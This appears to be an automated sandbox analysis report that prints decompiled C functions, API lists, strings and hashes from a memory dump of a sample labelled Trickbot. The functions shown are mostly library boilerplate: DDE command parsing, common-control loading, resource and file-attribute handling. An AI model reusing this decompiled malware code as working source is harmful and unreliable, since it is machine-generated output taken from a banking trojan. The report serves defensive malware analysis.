						E00417FB5(_t494 + 8, _t494, _t228);
						 *(_t494 - 4) = 1;
						_t415 = _t494 - 0x18;
						L6:
						E00417EC8(_t415);
						_t488 = E0041828E(0x22);
						_t501 = _t488 - 0xffffffff;
						if(_t488 != 0xffffffff) {
							_push(_t488);
							_push(_t494 - 0x18);
							_t233 = E0041524C(_t494 + 8);
							 *(_t494 - 4) = 5;
							E00417FB5(_t494 - 0x2c, _t494, _t233);
							 *(_t494 - 4) = 1;
							E00417EC8(_t494 - 0x18);
							_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) - _t488);
							_push(_t494 - 0x18);
							_t240 = E004151D0(_t494 + 8);
							 *(_t494 - 4) = 6;
							E00417FB5(_t494 + 8, _t494, _t240);
							 *(_t494 - 4) = 1;
							E00417EC8(_t494 - 0x18);
							 *(_t494 - 0x18) =  *(_t494 - 0x18) & 0x00000000;
							_t387 = 1;
							 *(_t494 - 0x10) = _t387;
							_t244 =  *((intOrPtr*)(E00432562() + 4));
							__eflags =  *(_t244 + 0xac);
							if( *(_t244 + 0xac) == 0) {
								 *(_t494 - 0x18) =  *( *((intOrPtr*)(E00432562() + 4)) + 0xac);
							} else {
								_t359 = E00432562();
								 *( *((intOrPtr*)(E00432562() + 4)) + 0x74) =  *( *((intOrPtr*)(_t359 + 4)) + 0xac);
								 *( *((intOrPtr*)(E00432562() + 4)) + 0xac) = _t494 - 0x40;
							}
							__eflags =  *(_t494 - 0x30) - _t387;
							if( *(_t494 - 0x30) != _t387) {
								__eflags =  *(_t494 - 0x30) - 3;
								if( *(_t494 - 0x30) != 3) {
									L29:
									_t248 = E0042AF65( *((intOrPtr*)(_t494 - 0x14)));
									_t249 = E00432562();
									_t388 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t249 + 4)))) + 0x7c))( *((intOrPtr*)(_t494 - 0x2c)));
									 *( *((intOrPtr*)(E00432562() + 4)) + 0xac) = _t494 - 0x40;
									SendMessageA( *( *((intOrPtr*)( *((intOrPtr*)(E00432562() + 4)) + 0x1c)) + 0x1c), 0x111, 0xe108, 0);
									 *( *((intOrPtr*)(E00432562() + 4)) + 0xac) = 0;
									_t260 = E0042AF65( *((intOrPtr*)(_t494 - 0x14)));
									__eflags = _t260 - _t248;
									if(_t260 > _t248) {
										 *((intOrPtr*)( *_t388 + 0x7c))();
									}
									_t261 = E0042F1C4();
									__eflags = _t261;
									if(_t261 == 0) {
										PostMessageA( *( *((intOrPtr*)( *((intOrPtr*)(E00432562() + 4)) + 0x1c)) + 0x1c), 0x10, 0, 0);
									}
									goto L33;
								}
								_push(3);
								_push(_t494 - 0x1c);
								_t273 = E0040504F( *((intOrPtr*)(E0041524C(_t494 + 8))), 0x43e1f0);
								__eflags = _t273;
								_t389 = _t387 & 0xffffff00 | _t273 != 0x00000000;
								E00417EC8(_t494 - 0x1c);
								__eflags = _t389;
								if(_t389 != 0) {
									L27:
									 *(_t494 - 0x10) =  *(_t494 - 0x10) & 0x00000000;
									goto L33;
								}
								_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) + 0xfffffffd);
								_push(_t494 - 0x1c);
								_t279 = E004151D0(_t494 + 8);
								 *(_t494 - 4) = 7;
								E00417FB5(_t494 + 8, _t494, _t279);
								 *(_t494 - 4) = 1;
								E00417EC8(_t494 - 0x1c);
								_t390 = E0041828E(0x22);
								__eflags = _t390 - 0xffffffff;
								if(_t390 == 0xffffffff) {
									goto L27;
								}
								_push(_t390);
								_push(_t494 - 0x1c);
								_t284 = E0041524C(_t494 + 8);
								 *(_t494 - 4) = 8;
								E00417FB5(_t494 - 0x28, _t494, _t284);
								 *(_t494 - 4) = 1;
								E00417EC8(_t494 - 0x1c);
								_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) - _t390);
								_push(_t494 - 0x1c);
								_t291 = E004151D0(_t494 + 8);
								 *(_t494 - 4) = 9;
								E00417FB5(_t494 + 8, _t494, _t291);
								 *(_t494 - 4) = 1;
								E00417EC8(_t494 - 0x1c);
								_push(3);
								_push(_t494 - 0x1c);
								_t297 = E0040504F( *((intOrPtr*)(E0041524C(_t494 + 8))), 0x43e1f0);
								__eflags = _t297;
								_t391 = _t390 & 0xffffff00 | _t297 != 0x00000000;
								E00417EC8(_t494 - 0x1c);
								__eflags = _t391;
								if(_t391 != 0) {
									goto L27;
								}
								_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) + 0xfffffffd);
								_push(_t494 - 0x1c);
								_t303 = E004151D0(_t494 + 8);
								 *(_t494 - 4) = 0xa;
								E00417FB5(_t494 + 8, _t494, _t303);
								 *(_t494 - 4) = 1;
								E00417EC8(_t494 - 0x1c);
								_t392 = E0041828E(0x22);
								__eflags = _t392 - 0xffffffff;
								if(_t392 == 0xffffffff) {
									goto L27;
								}
								_push(_t392);
								_push(_t494 - 0x1c);
								_t308 = E0041524C(_t494 + 8);
								 *(_t494 - 4) = 0xb;
								E00417FB5(_t494 - 0x24, _t494, _t308);
								 *(_t494 - 4) = 1;
								E00417EC8(_t494 - 0x1c);
								_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) - _t392);
								_push(_t494 - 0x1c);
								_t315 = E004151D0(_t494 + 8);
								 *(_t494 - 4) = 0xc;
								E00417FB5(_t494 + 8, _t494, _t315);
								 *(_t494 - 4) = 1;
								E00417EC8(_t494 - 0x1c);
								_push(3);
								_push(_t494 - 0x1c);
								_t321 = E0040504F( *((intOrPtr*)(E0041524C(_t494 + 8))), 0x43e1f0);
								__eflags = _t321;
								_t393 = _t392 & 0xffffff00 | _t321 != 0x00000000;
								E00417EC8(_t494 - 0x1c);
								__eflags = _t393;
								if(_t393 != 0) {
									goto L27;
								}
								_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) + 0xfffffffd);
								_push(_t494 - 0x1c);
								_t327 = E004151D0(_t494 + 8);
								 *(_t494 - 4) = 0xd;
								E00417FB5(_t494 + 8, _t494, _t327);
								 *(_t494 - 4) = 1;
								E00417EC8(_t494 - 0x1c);
								_t491 = E0041828E(0x22);
								__eflags = _t491 - 0xffffffff;
								if(_t491 != 0xffffffff) {
									_push(_t491);
									_push(_t494 - 0x1c);
									_t332 = E0041524C(_t494 + 8);
									 *(_t494 - 4) = 0xe;
									E00417FB5(_t494 - 0x20, _t494, _t332);
									 *(_t494 - 4) = 1;
									E00417EC8(_t494 - 0x1c);
									_t337 =  *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) - _t491;
									__eflags = _t337;
									_push(_t337);
									_push(_t494 - 0x1c);
									_t339 = E004151D0(_t494 + 8);
									 *(_t494 - 4) = 0xf;
									E00417FB5(_t494 + 8, _t494, _t339);
									 *(_t494 - 4) = 1;
									E00417EC8(_t494 - 0x1c);
									goto L29;
								}
								goto L27;
							} else {
								_t492 =  *((intOrPtr*)( *((intOrPtr*)(E00432562() + 4)) + 0x1c));
								_t394 =  *( *((intOrPtr*)(E00432562() + 4)) + 0x74);
								__eflags = _t394 - 0xffffffff;
								if(_t394 == 0xffffffff) {
									L14:
									_t346 = IsIconic( *(_t492 + 0x1c));
									asm("sbb eax, eax");
									_t349 = ( ~_t346 & _t482) + 5;
									__eflags = _t349;
									_t394 = _t349;
									L15:
									E0041B7D3(_t492, _t394);
									__eflags = _t394 - 6;
									if(_t394 != 6) {
										SetForegroundWindow( *(_t492 + 0x1c));
									}
									_t351 = E00432562();
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t351 + 4)))) + 0x7c))( *((intOrPtr*)(_t494 - 0x2c)));
									_t354 = E0042F1C4();
									__eflags = _t354;
									if(_t354 == 0) {
										E0042F1B5(1);
									}
									 *( *((intOrPtr*)(E00432562() + 4)) + 0x74) =  *( *((intOrPtr*)(E00432562() + 4)) + 0x74) | 0xffffffff;
									L33:
									_t262 = E00432562();
									_t486 =  *(_t494 - 0x10);
									 *( *((intOrPtr*)(_t262 + 4)) + 0xac) =  *(_t494 - 0x18);
									goto L34;
								}
								__eflags = _t394 - 1;
								if(_t394 != 1) {
									goto L15;
								}
								goto L14;
							}
						}
						_t486 = 0;
						goto L34;
					}
					 *(_t494 - 0x30) = 2;
					_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) + 0xfffffff8);
					_push(_t494 - 0x18);
					_t368 = E004151D0(_t494 + 8);
					 *(_t494 - 4) = 3;
					E00417FB5(_t494 + 8, _t494, _t368);
					 *(_t494 - 4) = 1;
					_t415 = _t494 - 0x18;
					goto L6;
				}
				 *(_t494 - 0x30) = 1;
				_push( *((intOrPtr*)( *((intOrPtr*)(_t494 + 8)) - 8)) + 0xfffffff9);
				_push(_t494 - 0x18);
				_t374 = E004151D0(_t494 + 8);
				 *(_t494 - 4) = 2;
				E00417FB5(_t494 + 8, _t494, _t374);
				 *(_t494 - 4) = 1;
				_t415 = _t494 - 0x18;
				goto L6;
			}

0x0042afac
0x0042afb7
0x0042afc0
0x0042afc5
0x0042afca
0x0042afcd
0x0042afd7
0x0042afdb
0x0042afdd
0x0042afde
0x0042afe2
0x0042aff2
0x0042affd
0x0042b004
0x0042b00b
0x0042b046
0x0042b048
0x0042b059
0x0042b064
0x0042b06b
0x0042b070
0x0042b072
0x0042b0aa
0x0042b0ac
0x0042b0bd
0x0042b0c8
0x0042b0cf
0x0042b0d4
0x0042b0d6
0x0042b560
0x0042b560
0x0042b567
0x0042b56c
0x0042b573
0x0042b580
0x0042b588
0x0042b588
0x0042b0df
0x0042b0ec
0x0042b0ec
0x0042b0ef
0x0042b0f3
0x0042b0f4
0x0042b0fd
0x0042b101
0x0042b106
0x0042b10a
0x0042b10d
0x0042b10d
0x0042b11c
0x0042b11e
0x0042b121
0x0042b12d
0x0042b12e
0x0042b132
0x0042b13b
0x0042b13f
0x0042b147
0x0042b14b
0x0042b15b
0x0042b15f
0x0042b160
0x0042b169
0x0042b16d
0x0042b175
0x0042b179
0x0042b17e
0x0042b184
0x0042b185
0x0042b18d
0x0042b190
0x0042b197
0x0042b1d3
0x0042b199
0x0042b199
0x0042b1af
0x0042b1bd
0x0042b1bd
0x0042b1d6
0x0042b1d9
0x0042b258
0x0042b25c
0x0042b4ba
0x0042b4bd
0x0042b4c4
0x0042b4d6
0x0042b4e3
0x0042b504
0x0042b515
0x0042b51b
0x0042b520
0x0042b522
0x0042b528
0x0042b528
0x0042b52b
0x0042b530
0x0042b532
0x0042b546
0x0042b546
0x00000000
0x0042b532
0x0042b265
0x0042b267
0x0042b279
0x0042b280
0x0042b285
0x0042b288
0x0042b28d
0x0042b28f
0x0042b45d
0x0042b45d
0x00000000
0x0042b45d
0x0042b2a1
0x0042b2a5
0x0042b2a6
0x0042b2af
0x0042b2b3
0x0042b2bb
0x0042b2bf
0x0042b2ce
0x0042b2d0
0x0042b2d3
0x00000000
0x00000000
0x0042b2dc
0x0042b2dd
0x0042b2e1
0x0042b2ea
0x0042b2ee
0x0042b2f6
0x0042b2fa
0x0042b30a
0x0042b30e
0x0042b30f
0x0042b318
0x0042b31c
0x0042b324
0x0042b328
0x0042b330
0x0042b332
0x0042b33f
0x0042b346
0x0042b34b
0x0042b34e
0x0042b353
0x0042b355
0x00000000
0x00000000
0x0042b367
0x0042b36b
0x0042b36c
0x0042b375
0x0042b379
0x0042b381
0x0042b385
0x0042b394
0x0042b396
0x0042b399
0x00000000
0x00000000
0x0042b3a2
0x0042b3a3
0x0042b3a7
0x0042b3b0
0x0042b3b4
0x0042b3bc
0x0042b3c0
0x0042b3d0
0x0042b3d4
0x0042b3d5
0x0042b3de
0x0042b3e2
0x0042b3ea
0x0042b3ee
0x0042b3f6
0x0042b3f8
0x0042b405
0x0042b40c
0x0042b411
0x0042b414
0x0042b419
0x0042b41b
0x00000000
0x00000000
0x0042b429
0x0042b42d
0x0042b42e
0x0042b437
0x0042b43b
0x0042b443
0x0042b447
0x0042b456
0x0042b458
0x0042b45b
0x0042b469
0x0042b46a
0x0042b46e
0x0042b477
0x0042b47b
0x0042b483
0x0042b487
0x0042b495
0x0042b495
0x0042b497
0x0042b49b
0x0042b49c
0x0042b4a5
0x0042b4a9
0x0042b4b1
0x0042b4b5
0x00000000
0x0042b4b5
0x00000000
0x0042b1db
0x0042b1e3
0x0042b1ee
0x0042b1f1
0x0042b1f4
0x0042b1fb
0x0042b1fe
0x0042b206
0x0042b20a
0x0042b20a
0x0042b20d
0x0042b20f
0x0042b212
0x0042b217
0x0042b21a
0x0042b21f
0x0042b21f
0x0042b225
0x0042b234
0x0042b237
0x0042b23c
0x0042b23e
0x0042b242
0x0042b242
0x0042b24f
0x0042b54c
0x0042b54c
0x0042b557
0x0042b55a
0x00000000
0x0042b55a
0x0042b1f6
0x0042b1f9
0x00000000
0x00000000
0x00000000
0x0042b1f9
0x0042b1d9
0x0042b123
0x00000000
0x0042b123
0x0042b077
0x0042b087
0x0042b08b
0x0042b08c
0x0042b095
0x0042b099
0x0042b09e
0x0042b0a2
0x00000000
0x0042b0a2
0x0042b010
0x0042b020
0x0042b024
0x0042b025
0x0042b02e
0x0042b032
0x0042b037
0x0042b03b
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0042AFAC

Part of subcall function 0041524C: __EH_prolog.LIBCMT ref: 00415251

Part of subcall function 00417EC8: InterlockedDecrement.KERNEL32(-000000F4), ref: 00417EDC

Part of subcall function 004151D0: __EH_prolog.LIBCMT ref: 004151D5

Part of subcall function 00417FB5: InterlockedIncrement.KERNEL32(-000000F4), ref: 00417FF8

IsIconic.USER32(?), ref: 0042B1FE
SetForegroundWindow.USER32(?), ref: 0042B21F
SendMessageA.USER32(?,00000111,0000E108,00000000), ref: 0042B504
PostMessageA.USER32(?,00000010,00000000,00000000), ref: 0042B546

Strings

[print(", xrefs: 0042B053
[open(", xrefs: 0042AFEC
",", xrefs: 0042B272, 0042B277, 0042B33D, 0042B403
[printto(", xrefs: 0042B0B7

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: H_prolog$InterlockedMessage$DecrementForegroundIconicIncrementPostSendWindow
String ID: ","$[open("$[print("$[printto("
API String ID: 3989956096-3790869113
Opcode ID: 0d385b6b280b16694258770c4fd1946cbc45f8adab54de0473a3c72e34178578
Instruction ID: 322305029b6920c44b1f2fc074338a34c946e435110a6dc26d67291c8b53ae42
Opcode Fuzzy Hash: 0d385b6b280b16694258770c4fd1946cbc45f8adab54de0473a3c72e34178578
Instruction Fuzzy Hash: 8912C831900209EFCB00EFB5C995EDEBBB4AF14354F10815EF815AB292DB7C9A85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0041B1EF, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0041B1EF(signed short _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed short _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}

0x0041b1f1
0x0041b1ff
0x0041b201
0x0041b207
0x0041b20b
0x0041b263
0x0041b20d
0x0041b213
0x0041b215
0x0041b21d
0x0041b23a
0x0041b242
0x0041b244
0x0041b24a
0x0041b24c
0x0041b252
0x0041b252
0x0041b24a
0x0041b21f
0x0041b22e
0x0041b230
0x0041b236
0x0041b236
0x0041b22e
0x0041b258
0x00000000
0x0041b25e

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,0041B4E9,?,00020000), ref: 0041B1F8
LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 0041B201
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0041B215
#17.COMCTL32 ref: 0041B230
#17.COMCTL32 ref: 0041B24C
FreeLibrary.KERNEL32(00000000), ref: 0041B258

Strings

COMCTL32.DLL, xrefs: 0041B1F1, 0041B1F7, 0041B1FE
InitCommonControlsEx, xrefs: 0041B20D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: daf12d92571b40ecc4b22d454508836f8d58f8b00eb2e75938c6c53bb679496a
Instruction ID: 92889b5e002c21d82985eea365ab80bd558b898f291d841b44894f592807a1a4
Opcode Fuzzy Hash: daf12d92571b40ecc4b22d454508836f8d58f8b00eb2e75938c6c53bb679496a
Instruction Fuzzy Hash: 30F0AF727402128B87119BA4DC4C9EFB2ACEFCC7617195476F940E3260CB78DC098BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00413B90, Relevance: 12.2, APIs: 8, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00413B90() {
				struct HBITMAP__* _t43;
				long _t50;
				signed int _t52;
				struct HRSRC__* _t118;
				struct HDC__* _t124;
				struct HINSTANCE__* _t125;
				void* _t126;
				void* _t128;
				void* _t129;
				void* _t131;

				_t125 =  *(_t129 + 0x10);
				_t118 = FindResourceA(_t125,  *(_t129 + 8), 2);
				if(_t118 != 0) {
					_t50 = SizeofResource(_t125, _t118);
					_t126 = LoadResource(_t125, _t118);
					if(_t126 != 0) {
						_t128 = GlobalAlloc(0x40, _t50);
						if(_t128 != 0) {
							_t52 = _t50 >> 2;
							memcpy(_t128, _t126, _t52 << 2);
							memcpy(_t126 + _t52 + _t52, _t126, _t50 & 0x00000003);
							_t131 = _t129 + 0x18;
							 *(_t131 + 0x10) = 0;
							 *(_t131 + 0x10) =  *(_t131 + 0x20) >> 0x10;
							 *(_t128 + 0x28) = 0 << 0x00000008 |  *(_t131 + 0x10) | 0 << 0x00000010;
							 *(_t131 + 0x10) = 0;
							 *(_t131 + 0x10) =  *(_t131 + 0x28) >> 0x10;
							 *(_t128 + 0x44) = 0 << 0x00000008 |  *(_t131 + 0x10) | 0 << 0x00000010;
							 *(_t131 + 0x10) = 0;
							 *(_t131 + 0x10) =  *(_t131 + 0x24) >> 0x10;
							 *(_t128 + 0x48) = 0 << 0x00000008 |  *(_t131 + 0x10) | 0 << 0x00000010;
							 *((intOrPtr*)(_t128 + 0x64)) = 0xbadbad;
							 *((intOrPtr*)(_t128 + 0x54)) = 0xbadbad;
							 *((intOrPtr*)(_t128 + 0x50)) = 0xbadbad;
							_t124 = GetDC(0);
							_t25 = _t128 + 0x68; // 0x68
							_t43 = CreateDIBitmap(_t124, _t128, 4, _t25, _t128, 0);
							ReleaseDC(0, _t124);
							GlobalFree(_t128);
							return _t43;
						} else {
							return 0;
						}
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}

0x00413b99
0x00413ba9
0x00413bad
0x00413bc3
0x00413bcd
0x00413bd1
0x00413be8
0x00413bec
0x00413bfe
0x00413c01
0x00413c08
0x00413c08
0x00413c14
0x00413c22
0x00413c3c
0x00413c3f
0x00413c49
0x00413c65
0x00413c6d
0x00413c77
0x00413c93
0x00413cb3
0x00413cd3
0x00413ced
0x00413cf6
0x00413cfb
0x00413d03
0x00413d0e
0x00413d15
0x00413d24
0x00413bee
0x00413bf7
0x00413bf7
0x00413bd3
0x00413bdc
0x00413bdc
0x00413baf
0x00413bb8
0x00413bb8

APIs

FindResourceA.KERNEL32(?,?,00000002), ref: 00413BA3
SizeofResource.KERNEL32(?,00000000,?,75B8679F,00000000,75B8DB4A,?,?,?,?,?,?,?,?,004117E1,00000001), ref: 00413BBD
LoadResource.KERNEL32(?,00000000,?,75B8679F,00000000,75B8DB4A,?,?,?,?,?,?,?,?,004117E1,00000001), ref: 00413BC7

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Resource$FindLoadSizeof
String ID:
API String ID: 507330600-0
Opcode ID: 3115cf56210fbae335df0030bf9c2b137c01719be5d41ca37075f0cd3e22a0a9
Instruction ID: 366b2114bf5115eacef2465804abc64a5b97d3fa3aeaf90854397626f2dc3b8e
Opcode Fuzzy Hash: 3115cf56210fbae335df0030bf9c2b137c01719be5d41ca37075f0cd3e22a0a9
Instruction Fuzzy Hash: 0441FF327046155BE70CCE29A856AAF77D2EBC8341F048A3EF946C3381DFB19909C3A5

Uniqueness

Uniqueness Score: -1.00%

Function 0041D790, Relevance: 12.1, APIs: 8, Instructions: 72
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041D790() {
				CHAR* _t29;
				CHAR* _t36;
				void* _t38;
				CHAR* _t47;
				void* _t53;

				E00405340(E00438510, _t53);
				_t47 =  *(_t53 + 8);
				if(GetFullPathNameA( *(_t53 + 0xc), 0x104, _t47, _t53 - 0x14) != 0) {
					_t29 =  *0x447478; // 0x44748c
					 *(_t53 + 8) = _t29;
					_push(_t53 + 8);
					 *(_t53 - 4) = 0;
					E0041D860(_t53, _t47);
					if(GetVolumeInformationA( *(_t53 + 8), 0, 0, 0, _t53 - 0x18, _t53 - 0x10, 0, 0) != 0) {
						if(( *(_t53 - 0x10) & 0x00000002) == 0) {
							CharUpperA(_t47);
						}
						if(( *(_t53 - 0x10) & 0x00000004) == 0) {
							_t38 = FindFirstFileA( *(_t53 + 0xc), _t53 - 0x158);
							if(_t38 != 0xffffffff) {
								FindClose(_t38);
								lstrcpyA( *(_t53 - 0x14), _t53 - 0x12c);
							}
						}
						_push(1);
						_pop(0);
					}
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					E00417EC8(_t53 + 8);
					_t36 = 0;
				} else {
					lstrcpynA(_t47,  *(_t53 + 0xc), 0x104);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t36;
			}

0x0041d795
0x0041d7a2
0x0041d7bb
0x0041d7cf
0x0041d7d4
0x0041d7dc
0x0041d7de
0x0041d7e1
0x0041d7fe
0x0041d804
0x0041d807
0x0041d807
0x0041d811
0x0041d81d
0x0041d826
0x0041d829
0x0041d839
0x0041d839
0x0041d826
0x0041d83f
0x0041d841
0x0041d841
0x0041d842
0x0041d849
0x0041d84e
0x0041d7bd
0x0041d7c2
0x0041d7c8
0x0041d7c8
0x0041d855
0x0041d85d

APIs

__EH_prolog.LIBCMT ref: 0041D795
GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 0041D7B3
lstrcpynA.KERNEL32(?,?,00000104), ref: 0041D7C2
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0041D7F6
CharUpperA.USER32(?), ref: 0041D807
FindFirstFileA.KERNEL32(?,?), ref: 0041D81D
FindClose.KERNEL32(00000000), ref: 0041D829
lstrcpyA.KERNEL32(?,?), ref: 0041D839

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
String ID:
API String ID: 304730633-0
Opcode ID: da020312d3d8d895f81e5f91db26ddbd9e93259d26d08d7181df88787c3a5777
Instruction ID: 24804879cee2903c005afe8d2ce52d33a969091811ca508bb309db6612736586
Opcode Fuzzy Hash: da020312d3d8d895f81e5f91db26ddbd9e93259d26d08d7181df88787c3a5777
Instruction Fuzzy Hash: D32171B1900119BBCB10AF65DC48EEFBFBCEF45764F008126F929E61A0D7748A45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041F155, Relevance: 10.6, APIs: 7, Instructions: 148
timeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0041F155(void* __ecx) {
				void* __esi;
				void* _t60;
				CHAR* _t83;
				void* _t95;
				struct _SECURITY_DESCRIPTOR* _t101;
				signed int _t102;
				void* _t120;
				CHAR** _t124;
				void* _t126;

				E00405340(E00437A38, _t126);
				_t120 = __ecx;
				_t124 = __ecx + 0x10;
				E00417E53(_t124, _t124);
				if(( *(_t126 + 0xd) & 0x00000010) != 0 && E0041E050( *(_t126 + 8), _t126 - 0x150) != 0) {
					_t83 =  *0x447478; // 0x44748c
					 *(_t126 - 0x10) = _t83;
					_t102 = 0;
					_push(_t126 - 0x10);
					 *(_t126 - 4) = 0;
					E0041D860(_t126,  *(_t126 + 8));
					if(GetDiskFreeSpaceA( *(_t126 - 0x10), _t126 - 0x24, _t126 - 0x20, _t126 - 0x1c, _t126 - 0x28) != 0) {
						_t102 =  *(_t126 - 0x24) *  *(_t126 - 0x20) *  *(_t126 - 0x1c);
					}
					_t91 =  *((intOrPtr*)(_t126 - 0x144));
					_t136 = _t102 -  *((intOrPtr*)(_t126 - 0x144)) + _t91;
					if(_t102 >  *((intOrPtr*)(_t126 - 0x144)) + _t91) {
						_push(1);
						_push( *(_t126 + 8));
						_push(_t126 - 0x14);
						_t95 = E0041F0AF(_t136);
						 *(_t126 - 4) = 1;
						E00417FB5(_t124, _t126, _t95);
						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
						E00417EC8(_t126 - 0x14);
					}
					 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
					E00417EC8(_t126 - 0x10);
				}
				_t58 =  *_t124;
				if( *((intOrPtr*)( *_t124 - 8)) == 0 || E0041D108(_t120, _t58,  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10))) == 0) {
					E00417E53(_t124, _t124);
					_t60 = E0041D108(_t120,  *(_t126 + 8),  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10)));
				} else {
					E00418005(_t120 + 0xc,  *(_t126 + 8));
					if(GetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38) != 0) {
						E0041E102(_t126 - 0x150, _t126 - 0x18);
						SetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38);
					}
					 *(_t126 + 0xc) = 0;
					if(GetFileSecurityA( *(_t126 + 8), 4, 0, 0, _t126 + 0xc) != 0) {
						_t101 = E0041BDEB( *(_t126 + 0xc));
						if(GetFileSecurityA( *(_t126 + 8), 4, _t101,  *(_t126 + 0xc), _t126 + 0xc) != 0) {
							SetFileSecurityA( *_t124, 4, _t101);
						}
						E0041BE14(_t101);
					}
					_t60 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
				return _t60;
			}

0x0041f15a
0x0041f168
0x0041f16a
0x0041f16f
0x0041f178
0x0041f195
0x0041f19a
0x0041f1a0
0x0041f1a2
0x0041f1a3
0x0041f1a9
0x0041f1c9
0x0041f1d2
0x0041f1d2
0x0041f1d6
0x0041f1de
0x0041f1e0
0x0041f1e2
0x0041f1e7
0x0041f1ea
0x0041f1eb
0x0041f1f6
0x0041f1fa
0x0041f1ff
0x0041f206
0x0041f206
0x0041f20b
0x0041f212
0x0041f212
0x0041f217
0x0041f21e
0x0041f2d6
0x0041f2e6
0x0041f23a
0x0041f240
0x0041f25c
0x0041f269
0x0041f27f
0x0041f27f
0x0041f296
0x0041f29d
0x0041f2a7
0x0041f2bb
0x0041f2c2
0x0041f2c2
0x0041f2c9
0x0041f2ce
0x0041f2d1
0x0041f2d1
0x0041f2f1
0x0041f2f9

APIs

